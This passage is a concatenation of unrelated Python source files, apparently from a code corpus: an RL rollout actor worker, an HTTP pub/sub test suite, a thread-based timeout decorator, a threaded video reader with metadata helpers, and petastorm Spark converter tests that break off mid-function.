calculating env steps, without waiting for actions.
This is somewhat similar to double-buffered rendering in computer graphics.
"""
def __init__(
self, cfg, obs_space, action_space, num_agents, worker_idx, shared_buffers,
task_queue, policy_queues, report_queue, learner_queues,
):
"""
Actor.
:param cfg: global config (all CLI params)
:param obs_space: observation space (spaces) of the environment
:param action_space: action space(s)
:param num_agents: number of agents per env (all env should have the same number of agents right now,
although it should be easy to fix)
:param worker_idx: index of this worker process
:param shared_buffers: shared memory data structures initialized in main process (see shared_buffers.py)
:param task_queue: queue for incoming messages for THIS particular actor worker. See the task types in the loop
below, but the most common task is ROLLOUT_STEP, which means "here's your actions, advance simulation by
one step".
:param policy_queues: FIFO queues associated with all policies participating in training. We send requests
for policy queue #N to get actions for envs (agents) that are controlled by policy #N.
:param report_queue: one-way communication with the main process, various stats and whatnot
:param learner_queues: one-way communication with the learner, sending trajectory buffers for learning
"""
super().__init__()
self.cfg = cfg
self.obs_space = obs_space
self.action_space = action_space
self.num_agents = num_agents
self.worker_idx = worker_idx
self.shared_buffers = shared_buffers
self.terminate = False
self.num_complete_rollouts = 0
self.vector_size = cfg.num_envs_per_worker
self.num_splits = cfg.worker_num_splits
assert self.vector_size >= self.num_splits
assert self.vector_size % self.num_splits == 0, 'Vector size should be divisible by num_splits'
self.env_runners = None
self.policy_queues = policy_queues
self.report_queue = report_queue
self.learner_queues = learner_queues
self.task_queue = task_queue
self.reward_shaping = [None for _ in range(self.cfg.num_policies)]
self.process = TorchProcess(target=self._run, daemon=True)
self.process.start()
def _init(self):
"""
Initialize the env runners, which actually do all the work. We also do some utility setup here, e.g.
setting process affinity (this is a performance optimization).
"""
log.info('Initializing envs for env runner %d...', self.worker_idx)
if self.cfg.force_envs_single_thread:
from threadpoolctl import threadpool_limits
threadpool_limits(limits=1, user_api=None)
if self.cfg.set_workers_cpu_affinity:
set_process_cpu_affinity(self.worker_idx, self.cfg.num_workers)
psutil.Process().nice(min(self.cfg.default_niceness + 10, 20))
self.env_runners = []
for split_idx in range(self.num_splits):
env_runner = VectorEnvRunner(
self.cfg, self.vector_size // self.num_splits, self.worker_idx, split_idx, self.num_agents,
self.shared_buffers, self.reward_shaping,
)
env_runner.init()
self.env_runners.append(env_runner)
def _terminate(self):
for env_runner in self.env_runners:
env_runner.close()
self.terminate = True
def _enqueue_policy_request(self, split_idx, policy_inputs):
"""Distribute action requests to their corresponding queues."""
for policy_id, requests in policy_inputs.items():
policy_request = (self.worker_idx, split_idx, requests)
self.policy_queues[policy_id].put(policy_request)
def _enqueue_complete_rollouts(self, split_idx, complete_rollouts):
"""Send complete rollouts from VectorEnv to the learner."""
if self.cfg.sampler_only:
return
rollouts = complete_rollouts['rollouts']
traj_buffer_idx = complete_rollouts['traj_buffer_idx']
# mark the trajectory buffer that we're sending to the learner as unavailable until the learner
# finishes processing
env_runner = self.env_runners[split_idx]
env_runner.traj_tensors_available[:, :, traj_buffer_idx] = 0
rollouts_per_policy = dict()
for rollout in rollouts:
policy_id = rollout['policy_id']
if policy_id not in rollouts_per_policy:
rollouts_per_policy[policy_id] = dict(
rollouts=[], worker_idx=self.worker_idx,
split_idx=split_idx, traj_buffer_idx=traj_buffer_idx,
)
rollouts_per_policy[policy_id]['rollouts'].append(rollout)
for policy_id, rollouts in rollouts_per_policy.items():
self.learner_queues[policy_id].put((TaskType.TRAIN, rollouts))
def _report_stats(self, stats):
for report in stats:
self.report_queue.put(report)
def _handle_reset(self):
"""
Reset all envs, one split at a time (double-buffering), and send requests to policy workers to get
actions for the very first env step.
"""
for split_idx, env_runner in enumerate(self.env_runners):
policy_inputs = env_runner.reset(self.report_queue)
self._enqueue_policy_request(split_idx, policy_inputs)
log.info('Finished reset for worker %d', self.worker_idx)
self.report_queue.put(dict(finished_reset=self.worker_idx))
def _advance_rollouts(self, data, timing):
"""
Process incoming request from policy worker. Use the data (policy outputs, actions) to advance the simulation
by one step on the corresponding VectorEnvRunner.
If we successfully managed to advance the simulation, send requests to policy workers to get actions for the
next step. If we completed the entire rollout, also send request to the learner!
:param data: request from the policy worker, containing actions and other policy outputs
:param timing: profiling stuff
"""
split_idx = data['split_idx']
runner = self.env_runners[split_idx]
policy_request, complete_rollouts, episodic_stats = runner.advance_rollouts(data, timing)
with timing.add_time('complete_rollouts'):
if complete_rollouts:
self._enqueue_complete_rollouts(split_idx, complete_rollouts)
if self.num_complete_rollouts == 0 and not self.cfg.benchmark:
# we just finished our first complete rollouts, perfect time to wait for experience decorrelation
# this guarantees that there won't be any "old" trajectories when we awaken
delay = (float(self.worker_idx) / self.cfg.num_workers) * self.cfg.decorrelate_experience_max_seconds
log.info(
'Worker %d, sleep for %.3f sec to decorrelate experience collection',
self.worker_idx, delay,
)
time.sleep(delay)
log.info('Worker %d awakens!', self.worker_idx)
self.num_complete_rollouts += len(complete_rollouts['rollouts'])
with timing.add_time('enqueue_policy_requests'):
if policy_request is not None:
self._enqueue_policy_request(split_idx, policy_request)
if episodic_stats:
self._report_stats(episodic_stats)
def _process_pbt_task(self, pbt_task):
"""Save the latest version of reward shaping from PBT, we later propagate this to envs."""
task_type, data = pbt_task
if task_type == PbtTask.UPDATE_REWARD_SCHEME:
policy_id, new_reward_shaping_scheme = data
self.reward_shaping[policy_id] = new_reward_shaping_scheme
def _run(self):
"""
Main loop of the actor worker (rollout worker).
Process tasks (mainly ROLLOUT_STEP) until we get the termination signal, which usually means end of training.
Currently there is no mechanism to restart dead workers if something bad happens during training. We can only
retry on the initial reset(). This is definitely something to work on.
"""
log.info('Initializing vector env runner %d...', self.worker_idx)
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
if self.cfg.actor_worker_gpus:
set_gpus_for_process(
self.worker_idx,
num_gpus_per_process=1, process_type='actor', available_gpus=self.cfg.actor_worker_gpus,
)
torch.multiprocessing.set_sharing_strategy('file_system')
timing = Timing()
last_report = time.time()
with torch.no_grad():
while not self.terminate:
try:
try:
with timing.add_time('waiting'), timing.timeit('wait_actor'):
tasks = self.task_queue.get_many(timeout=0.1)
except Empty:
tasks = []
for task in tasks:
task_type, data = task
if task_type == TaskType.INIT:
self._init()
continue
if task_type == TaskType.TERMINATE:
self._terminate()
break
# handling actual workload
if task_type == TaskType.ROLLOUT_STEP:
if 'work' not in timing:
timing.waiting = 0 # measure waiting only after real work has started
with timing.add_time('work'), timing.timeit('one_step'):
self._advance_rollouts(data, timing)
elif task_type == TaskType.RESET:
with timing.add_time('reset'):
self._handle_reset()
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
if time.time() - last_report > 5.0 and 'one_step' in timing:
timing_stats = dict(wait_actor=timing.wait_actor, step_actor=timing.one_step)
memory_mb = memory_consumption_mb()
stats = dict(memory_actor=memory_mb)
self.report_queue.put(dict(timing=timing_stats, stats=stats))
last_report = time.time()
except RuntimeError as exc:
log.warning('Error while processing data w: %d, exception: %s', self.worker_idx, exc)
log.warning('Terminate process...')
self.terminate = True
self.report_queue.put(dict(critical_error=self.worker_idx))
except KeyboardInterrupt:
self.terminate = True
except:
log.exception('Unknown exception in rollout worker')
self.terminate = True
if self.worker_idx <= 1:
time.sleep(0.1)
log.info(
'Env runner %d, CPU aff. %r, rollouts %d: timing %s',
self.worker_idx, psutil.Process().cpu_affinity(), self.num_complete_rollouts, timing,
)
def init(self):
self.task_queue.put((TaskType.INIT, None))
def request_reset(self):
self.task_queue.put((TaskType.RESET, None))
def request_step(self, split, actions):
data = (split, actions)
self.task_queue.put((TaskType.ROLLOUT_STEP, data))
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
def join(self):
join_or_kill(self.process)
|
http_test.py
|
#! /usr/bin/env python
from datetime import datetime
from httplib import HTTPConnection
from json import dumps, loads
from sys import argv
from threading import Thread
from time import sleep, time as now
from unittest import main, TestCase
from uuid import uuid1
FACTS = [{"headline": "Aliens Land", "body": "They just arriv--AAGH!"},
{"headline": "Moon Eaten", "body": "It's just gone!"},
{"headline": "Bananas Banned", "body": "Bad for teeth."}]
HTML_CONTENT_TYPE = 'text/html; charset=utf-8'
TEXT_CONTENT_TYPE = 'text/plain; charset=utf-8'
JSON_CONTENT_TYPE = 'application/json'
class HTTPTest(TestCase):
def setUp(self):
self.url, self.port = argv[1], int(argv[2])
self.conn = HTTPConnection(self.url, self.port)
def test_home(self):
self._visit(verb='GET', path='/',
exp_status=200, exp_content_type=HTML_CONTENT_TYPE)
def test_publish_valid_fact(self):
topic = self._new_unique_topic()
self._visit(verb='POST', path='topics/%s/facts' % (topic,),
exp_status=202, exp_content_type=TEXT_CONTENT_TYPE,
content=dumps(FACTS[0]))
def test_publish_invalid_fact(self):
topic = self._new_unique_topic()
self._visit(verb='POST', path='topics/%s/facts' % (topic,),
exp_status=400, exp_content_type=TEXT_CONTENT_TYPE,
content='invalid fact')
def test_retrieve_fact(self):
topic = self._new_unique_topic()
self._publish_fact(topic, FACTS[0])
sleep(0.1)
response = self._visit(verb='GET', path='topics/%s/facts' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
returned_facts = loads(response.read())
self.assertEqual(1, len(returned_facts))
raw_fact = self._check_and_extract(returned_facts[0])
self.assertEqual(FACTS[0], raw_fact)
def test_retrieve_facts_after_id(self):
topic = self._new_unique_topic()
map(lambda f: self._publish_fact(topic, f), FACTS)
sleep(0.1)
response = self._visit(verb='GET', path='topics/%s/facts' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
all_ids = self._extract_fact_ids(response)
first_id = min(all_ids)
path = 'topics/%s/facts?after_id=%d' % (topic, first_id)
response = self._visit(verb='GET', path=path, exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
returned_ids = self._extract_fact_ids(response)
self.assertEqual(all_ids[1:], returned_ids)
def test_subscribe_and_retrieve(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
self._publish_fact(topic, FACTS[0])
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
response = self._visit(verb='GET', path=path, exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
self.assertEqual(FACTS[0], loads(response.read()))
self._assertHeadersPreventCaching(dict(response.getheaders()))
def test_subscribe_and_timeout(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
start = now()
response = self._visit(verb='GET', path=path,
headers={'Patience': '1'},
exp_status=204,
exp_content_type=TEXT_CONTENT_TYPE)
response.read()
duration = now() - start
self.assertTrue(duration < 2,
'Should wait only as specified in Patience header')
def test_nonexistent_subscription_id(self):
topic = self._new_unique_topic()
path = '/topics/%s/subscriptions/nonexistent/next' % (topic,)
response = self._visit(verb='GET', path=path,
exp_status=404,
exp_content_type=TEXT_CONTENT_TYPE)
response.read()
def test_retrieve_topics(self):
topic1 = self._new_unique_topic()
self._publish_fact(topic1, FACTS[0])
topic2 = self._new_unique_topic()
self._publish_fact(topic2, FACTS[1])
sleep(0.1)
response = self._visit(verb='GET', path='topics', exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
topics = map(lambda x: x['topic_name'], loads(response.read()))
self.assertIn(topic1, topics)
self.assertIn(topic2, topics)
def test_simultaneous_requests(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
thread = Thread(target=self._wait_on_sub, args=(topic, sub_id))
thread.daemon = True
thread.start()
sleep(0.5)
conn = HTTPConnection(self.url, self.port)
conn.request('GET', 'topics', '', {})
conn.getresponse().read()
self.assertTrue(thread.is_alive(),
msg='Should run two queries at once')
thread.join()
def _wait_on_sub(self, topic, sub_id):
conn = HTTPConnection(self.url, self.port)
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
conn.request('GET', path, '', {'Patience': '2'})
conn.getresponse().read()
def _extract_fact_ids(self, response):
return map(lambda f: f['combo_id'], loads(response.read()))
def _visit(self, verb, path,
exp_status, exp_content_type,
headers={}, content=''):
self.conn.request(verb, path, content, headers)
response = self.conn.getresponse()
self.assertEqual(exp_status, response.status)
actual_content_type = response.getheader('Content-Type')
self.assertEqual(exp_content_type, actual_content_type)
return response
def _publish_fact(self, topic, fact):
response = self._visit(verb='POST',
path='topics/%s/facts' % (topic,),
exp_status=202,
exp_content_type=TEXT_CONTENT_TYPE,
content=dumps(fact))
response.read()
def _check_and_extract(self, returned_fact):
raw_fact = dict(returned_fact)
for key in ['combo_id', 'combo_timestamp', 'combo_topic']:
self.assertIn(key, returned_fact)
del raw_fact[key]
return raw_fact
def _new_unique_topic(self):
return str(uuid1())
def _assertHeadersPreventCaching(self, headers):
self.assertEqual('no-cache, must-revalidate',
headers['cache-control'])
expires = datetime.strptime(headers['expires'],
'%a, %d %b %Y %H:%M:%S GMT')
self._assertIsInPast(expires, 'Should expire in the past')
def _assertIsInPast(self, date, msg):
self.assertTrue(date < datetime.now(), msg)
if __name__ == '__main__':
main(argv=['http_test.py'])
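# Usage (inferred from setUp, which reads the target server from argv):
#   python http_test.py <host> <port>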
|
timeout.py
|
import sys
import threading
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method.
Based on "Kill a thread in Python":
http://mail.python.org/pipermail/python-list/2004-May/260937.html
"""
def __init__(self, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
self.killed = False
self.__run_backup = self.run
self.run = self.__run # Force the Thread to install our trace.
def start(self):
"""Start the thread."""
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
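# once kill() has set self.killed, the next 'line' trace event raises
# SystemExit inside the target thread, unwinding it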
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
class TimeoutException(Exception):
"""function run timeout"""
pass
def timeout(seconds):
"""
Timeout decorator: specify the timeout in seconds.
If the decorated function does not return within that time, raise TimeoutException.
"""
def timeout_decorator(func):
"""真正的装饰器"""
def _new_func(oldfunc, result, oldfunc_args, oldfunc_kwargs):
result.append(oldfunc(*oldfunc_args, **oldfunc_kwargs))
def _(*args, **kwargs):
result = []
new_kwargs = { # create new kwargs for _new_func so we can capture the wrapped function's return value in the result list
'oldfunc': func,
'result': result,
'oldfunc_args': args,
'oldfunc_kwargs': kwargs
}
thd = KThread(target=_new_func, args=(), kwargs=new_kwargs)
thd.start()
thd.join(seconds)
alive = thd.is_alive()
thd.kill() # kill the child thread
if alive:
raise TimeoutException(u'function run too long, timeout %d seconds.' % seconds)
else:
return result[0]
_.__name__ = func.__name__
_.__doc__ = func.__doc__
return _
return timeout_decorator
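# Minimal usage sketch (slow_op is an illustrative name, not part of this module):
#
#   @timeout(2)
#   def slow_op():
#       sleep(5)  # with: from time import sleep
#
#   try:
#       slow_op()
#   except TimeoutException as e:
#       print(e)  # raised because slow_op exceeded its 2-second budget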
|
video_utils.py
|
#############################################################################
#
# VFRAME
# MIT License
# Copyright (c) 2020 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
from pathlib import Path
from datetime import datetime
import time
from threading import Thread
from queue import Queue
from pymediainfo import MediaInfo
from PIL import Image
import cv2 as cv
import dacite
import imagehash
from vframe.settings import app_cfg
from vframe.settings.app_cfg import LOG
from vframe.models.mediameta import MediaMeta
from vframe.utils import file_utils
from vframe.utils.im_utils import pil2np, np2pil, resize
# --------------------------------------------------------------
# based on code from jrosebr1 (PyImageSearch)
# from imutils.video
# https://raw.githubusercontent.com/jrosebr1/imutils/master/imutils/video/filevideostream.py
# --------------------------------------------------------------
"""
TODO
- improve error handling on empty container MP4s by inspecting video properties
- improve image/video separation
"""
class FileVideoStream:
frame_count = 0
def __init__(self, fp, queue_size=512, use_prehash=False):
"""Threaded video reader
"""
# TODO: cv.CAP_FFMPEG, cv.CAP_GSTREAMER
# self.vcap = cv.VideoCapture(str(fp), cv.CAP_FFMPEG)
self.is_image = Path(fp).suffix[1:].lower() in ['jpg', 'png']
self.use_prehash = use_prehash
# TODO: explore further. currently not working
# self.vcap.set(cv.CAP_PROP_HW_ACCELERATION, 0.0)
# self.vcap.set(cv.CAP_PROP_HW_DEVICE, 0.0)
# LOG.debug(f'CAP_PROP_HW_ACCELERATION: {self.vcap.get(cv.CAP_PROP_HW_ACCELERATION)}')
# LOG.debug(f'CAP_PROP_HW_DEVICE: {self.vcap.get(cv.CAP_PROP_HW_DEVICE)}')
# LOG.debug(f'Using backend:: {self.vcap.getBackendName()}')
# self.vcap.set(cv.CAP_PROP_BUFFERSIZE, 1024*20)
if self.is_image:
self.fps = 25.0 # default 25.0 for still image
im = Image.open(fp)
self.width, self.height = im.size
self.dim = (self.width, self.height)
self.index = -1
self.frame_read_index = 0
self.stopped = True
self.frame_count = 1
self.queue = Queue(maxsize=1)
self.queue.put(im)
else:
self.vcap = cv.VideoCapture(str(fp), cv.CAP_FFMPEG)
self.queue = Queue(maxsize=queue_size)
try:
self.height = int(self.vcap.get(cv.CAP_PROP_FRAME_HEIGHT))
self.width = int(self.vcap.get(cv.CAP_PROP_FRAME_WIDTH))
if file_utils.get_ext(fp).lower() in app_cfg.VALID_PIPE_IMAGE_EXTS:
self.frame_count = 1 # force set image to 1 frame
else:
self.frame_count = int(self.vcap.get(cv.CAP_PROP_FRAME_COUNT))
self.vcap_cc = self.vcap.get(cv.CAP_PROP_FOURCC)
self.fps = self.vcap.get(cv.CAP_PROP_FPS)
self.stopped = False
self.index = -1
# initialize queue used to store frames
if self.use_prehash:
self.queue_phash = Queue(maxsize=queue_size)
# initialize thread
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.frame_read_index = 0
self.spf = 1 / self.fps # seconds per frame
self.mspf = self.spf * 1000 # milliseconds per frame
except Exception as e:
# TODO: add error logging
LOG.error(f'Skipping corrupt file: {fp}. Error: {e}')
self.dim = (self.width, self.height)
def start(self):
# start a thread to read frames from the file video stream
if self.frame_count > 0:
if not self.is_image:
self.thread.start()
return self
else:
return None
def update(self):
# keep looping infinitely
while True:
if self.stopped:
break
if not self.queue.full():
(frame_ok, frame) = self.vcap.read()
self.frame_read_index += 1
if not frame_ok:
self.stopped = True
break
else:
# frame
self.queue.put(frame)
# add phash
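# (the frame is shrunk to 32x32 grayscale first, presumably to keep
# the per-frame hash computation cheap)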
if self.use_prehash:
frame = cv.resize(frame, (32, 32), interpolation=cv.INTER_NEAREST)
frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
phash = imagehash.phash(np2pil(frame))
self.queue_phash.put(phash)
else:
time.sleep(0.1)
if not self.is_image:
self.vcap.release()
def release(self):
if self.frame_count > 0:
del self.queue
if self.use_prehash:
del self.queue_phash
if not self.is_image:
self.vcap.release()
def read_frame(self):
# return next frame in the queue
self.index += 1
if self.is_image:
return pil2np(self.queue.get())
else:
return self.queue.get()
def read_frame_phash(self):
# return next frame in the queue
self.index += 1
if self.is_image:
return (pil2np(self.queue.get()), self.queue_phash.get())
else:
return (self.queue.get(), self.queue_phash.get())
# check if all available video frames read
def running(self):
return self.more() or not self.stopped
def more(self):
# return True if there are still frames in the queue. If stream is not stopped, try to wait a moment
tries = 0
while self.queue.qsize() == 0 and not self.stopped and tries < 5:
time.sleep(0.1)
tries += 1
return self.queue.qsize() > 0
def stop(self):
if self.frame_count > 0:
# indicate that the thread should be stopped
self.stopped = True
# wait until stream resources are released (the producer thread might still be grabbing a frame)
if not self.is_image:
self.thread.join()
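# Minimal consumption sketch using this class's own API (the path is a placeholder):
#
#   fvs = FileVideoStream('/path/to/video.mp4').start()
#   if fvs is not None:
#       while fvs.running():
#           if fvs.more():
#               frame = fvs.read_frame()  # next decoded frame as an ndarray
#       fvs.stop()
#       fvs.release()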
def mediainfo(fp_in):
"""Returns abbreviated video/audio metadata for video files
:param fp_in: filepath"""
# extension and media type
ext = file_utils.get_ext(fp_in)
if ext in app_cfg.VALID_PIPE_IMAGE_EXTS:
media_type = 'image'
elif ext in app_cfg.VALID_PIPE_VIDEO_EXTS:
media_type = 'video'
else:
media_type = 'invalid'
# init data
data = {
'filename': Path(fp_in).name,
'ext': ext,
'media_type': media_type
}
if media_type == 'image':
# extend image metadata
try:
im = Image.open(fp_in)
width, height = im.size
data.update({'width': width, 'height': height})
except Exception as e:
LOG.error(f'{fp_in} not valid. Skipping.')
data.update({'valid': False})
elif media_type == 'video':
# extend video metadata if available
attrs = MediaInfo.parse(fp_in).to_data()
video_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'Video']
general_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'General']
#audio_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'Audio']
if video_attrs and general_attrs:
video_attrs = video_attrs[0]
general_attrs = general_attrs[0]
# use float, then int below to avoid "invalid literal for int()" errors
if 'encoded_date' in general_attrs.keys():
encoded_date = str(general_attrs.get('encoded_date', ''))
created_at = str(datetime.strptime(encoded_date, '%Z %Y-%m-%d %H:%M:%S'))
elif 'file_last_modification_date' in general_attrs.keys():
encoded_date = str(general_attrs.get('file_last_modification_date', ''))
created_at = str(datetime.strptime(encoded_date, '%Z %Y-%m-%d %H:%M:%S'))
else:
created_at = str(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
app_cfg.LOG.warning(f'No date available for {fp_in}. Using now()')
data.update({
'codec': video_attrs.get('codec_id', ''),
'duration': int(float(video_attrs.get('duration', 0))),
'aspect_ratio': float(video_attrs.get('display_aspect_ratio', 0)),
'width': int(video_attrs.get('width', 0)),
'height': int(video_attrs.get('height', 0)),
'frame_rate': float(video_attrs.get('frame_rate', 0)),
'frame_count': int(float(video_attrs.get('frame_count', 0))),
'created_at': created_at
})
else:
LOG.error(f'{fp_in} not valid. Skipping.')
data.update({'valid': False})
mediameta = dacite.from_dict(data=data, data_class=MediaMeta)
return mediameta
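# e.g. (path is a placeholder): mediainfo('/path/to/clip.mp4') returns a populated
# MediaMeta dataclass, with valid=False for files that could not be parsed.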
|
test_spark_dataset_converter.py
|
# Copyright (c) 2020 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
import tempfile
import threading
import time
from distutils.version import LooseVersion
import numpy as np
import pyspark
import pytest
import py4j
import tensorflow.compat.v1 as tf # pylint: disable=import-error
from pyspark.sql.functions import pandas_udf
from pyspark.sql.types import (ArrayType, BinaryType, BooleanType, ByteType,
DoubleType, FloatType, IntegerType, LongType,
ShortType, StringType, StructField, StructType)
from six.moves.urllib.parse import urlparse
from petastorm import make_batch_reader
from petastorm.fs_utils import FilesystemResolver
from petastorm.spark import (SparkDatasetConverter, make_spark_converter,
spark_dataset_converter)
from petastorm.spark.spark_dataset_converter import (
_check_dataset_file_median_size, _check_parent_cache_dir_url,
_check_rank_and_size_consistent_with_horovod, _check_url,
_get_horovod_rank_and_size, _get_spark_session, _make_sub_dir_url,
register_delete_dir_handler, _wait_file_available)
try:
from mock import mock
except ImportError:
from unittest import mock
from petastorm.tests.test_tf_utils import create_tf_graph
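# The tests below exercise the basic converter workflow, roughly:
#
#   spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF, cache_url)
#   converter = make_spark_converter(df)  # materializes df as parquet under cache_url
#   with converter.make_tf_dataset() as dataset:
#       ...  # consume as a tf.data.Dataset
#   converter.delete()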
@create_tf_graph
def test_primitive(spark_test_ctx):
schema = StructType([
StructField("bool_col", BooleanType(), False),
StructField("float_col", FloatType(), False),
StructField("double_col", DoubleType(), False),
StructField("short_col", ShortType(), False),
StructField("int_col", IntegerType(), False),
StructField("long_col", LongType(), False),
StructField("str_col", StringType(), False),
StructField("bin_col", BinaryType(), False),
StructField("byte_col", ByteType(), False),
])
df = spark_test_ctx.spark.createDataFrame(
[(True, 0.12, 432.1, 5, 5, 0, "hello",
bytearray(b"spark\x01\x02"), -128),
(False, 123.45, 0.987, 9, 908, 765, "petastorm",
bytearray(b"\x0012345"), 127)],
schema=schema).coalesce(1)
# If we use numPartition > 1, the order of the loaded dataset would
# be non-deterministic.
expected_df = df.collect()
converter = make_spark_converter(df)
with converter.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
# TODO: we will improve the test once the batch_size argument
# is added.
# Now we only have one batch.
for i in range(converter.dataset_size):
for col in df.schema.names:
actual_ele = getattr(ts, col)[i]
expected_ele = expected_df[i][col]
if col == "str_col":
actual_ele = actual_ele.decode()
if col == "bin_col":
actual_ele = bytearray(actual_ele)
if col == "float_col" or col == "double_col":
# Note that the default dtype is float32
assert pytest.approx(expected_ele, rel=1e-6) == actual_ele
else:
assert expected_ele == actual_ele
assert len(expected_df) == len(converter)
assert np.bool_ == ts.bool_col.dtype.type
assert np.float32 == ts.float_col.dtype.type
# Default dtype float32
assert np.float32 == ts.double_col.dtype.type
assert np.int16 == ts.short_col.dtype.type
assert np.int32 == ts.int_col.dtype.type
assert np.int64 == ts.long_col.dtype.type
assert np.object_ == ts.str_col.dtype.type
assert np.object_ == ts.bin_col.dtype.type
@create_tf_graph
def test_array_field(spark_test_ctx):
@pandas_udf('array<float>')
def gen_array(v):
return v.map(lambda x: np.random.rand(10))
df1 = spark_test_ctx.spark.range(10).withColumn('v', gen_array('id')).repartition(2)
cv1 = make_spark_converter(df1)
# we can auto infer one-dim array shape
with cv1.make_tf_dataset(batch_size=4, num_epochs=1) as dataset:
tf_iter = dataset.make_one_shot_iterator()
next_op = tf_iter.get_next()
with tf.Session() as sess:
batch1 = sess.run(next_op)
assert batch1.v.shape == (4, 10)
def test_delete(spark_test_ctx):
df = spark_test_ctx.spark.createDataFrame([(1, 2), (4, 5)], ["col1", "col2"])
# TODO add test for hdfs url
converter = make_spark_converter(df)
local_path = urlparse(converter.cache_dir_url).path
assert os.path.exists(local_path)
converter.delete()
assert not os.path.exists(local_path)
def test_atexit(spark_test_ctx):
lines = """
from petastorm.spark import SparkDatasetConverter, make_spark_converter
from pyspark.sql import SparkSession
import os
spark = SparkSession.builder.getOrCreate()
spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF, '{temp_url}')
df = spark.createDataFrame([(1, 2),(4, 5)], ["col1", "col2"])
converter = make_spark_converter(df)
f = open(os.path.join('{tempdir}', 'test_atexit.out'), "w")
f.write(converter.cache_dir_url)
f.close()
""".format(tempdir=spark_test_ctx.tempdir, temp_url=spark_test_ctx.temp_url)
code_str = "; ".join(
line.strip() for line in lines.strip().splitlines())
ret_code = subprocess.call([sys.executable, "-c", code_str])
assert 0 == ret_code
with open(os.path.join(spark_test_ctx.tempdir, 'test_atexit.out')) as f:
cache_dir_url = f.read()
fs = FilesystemResolver(cache_dir_url).filesystem()
assert not fs.exists(urlparse(cache_dir_url).path)
def test_set_delete_handler(spark_test_ctx):
def test_delete_handler(dir_url):
raise RuntimeError('Not implemented delete handler.')
register_delete_dir_handler(test_delete_handler)
with pytest.raises(RuntimeError, match='Not implemented delete handler'):
spark_dataset_converter._delete_dir_handler(spark_test_ctx.temp_url)
# Restore the default delete handler (other tests will use it)
register_delete_dir_handler(None)
def _get_compression_type(data_url):
files = os.listdir(urlparse(data_url).path)
pq_files = list(filter(lambda x: x.endswith('.parquet'), files))
filename_splits = pq_files[0].split('.')
if len(filename_splits) == 2:
return "uncompressed"
else:
return filename_splits[1]
def test_compression(spark_test_ctx):
df1 = spark_test_ctx.spark.range(10)
converter1 = make_spark_converter(df1)
assert "uncompressed" == \
_get_compression_type(converter1.cache_dir_url).lower()
converter2 = make_spark_converter(df1, compression_codec="snappy")
assert "snappy" == \
_get_compression_type(converter2.cache_dir_url).lower()
def test_df_caching(spark_test_ctx):
df1 = spark_test_ctx.spark.range(10)
df2 = spark_test_ctx.spark.range(10)
df3 = spark_test_ctx.spark.range(20)
# Test caching for the dataframes with the same logical plan
converter1 = make_spark_converter(df1)
converter2 = make_spark_converter(df2)
assert converter1.cache_dir_url == converter2.cache_dir_url
# Test no caching for different dataframes
converter3 = make_spark_converter(df3)
assert converter1.cache_dir_url != converter3.cache_dir_url
# Test no caching for the same dataframe with different row group size
converter11 = make_spark_converter(
df1, parquet_row_group_size_bytes=8 * 1024 * 1024)
converter21 = make_spark_converter(
df1, parquet_row_group_size_bytes=16 * 1024 * 1024)
assert converter11.cache_dir_url != converter21.cache_dir_url
# Test no caching for the same dataframe with different compression_codec
converter12 = make_spark_converter(df1, compression_codec=None)
converter22 = make_spark_converter(df1, compression_codec="snappy")
assert converter12.cache_dir_url != converter22.cache_dir_url
ori_temp_url = spark_test_ctx.spark.conf.get(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF)
tempdir = tempfile.mkdtemp('_spark_converter_test1')
new_temp_url = 'file://' + tempdir.replace(os.sep, '/')
try:
# Test no caching for the same dataframe with different parent cache dirs
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
new_temp_url)
assert ori_temp_url != new_temp_url
converter13 = make_spark_converter(df1)
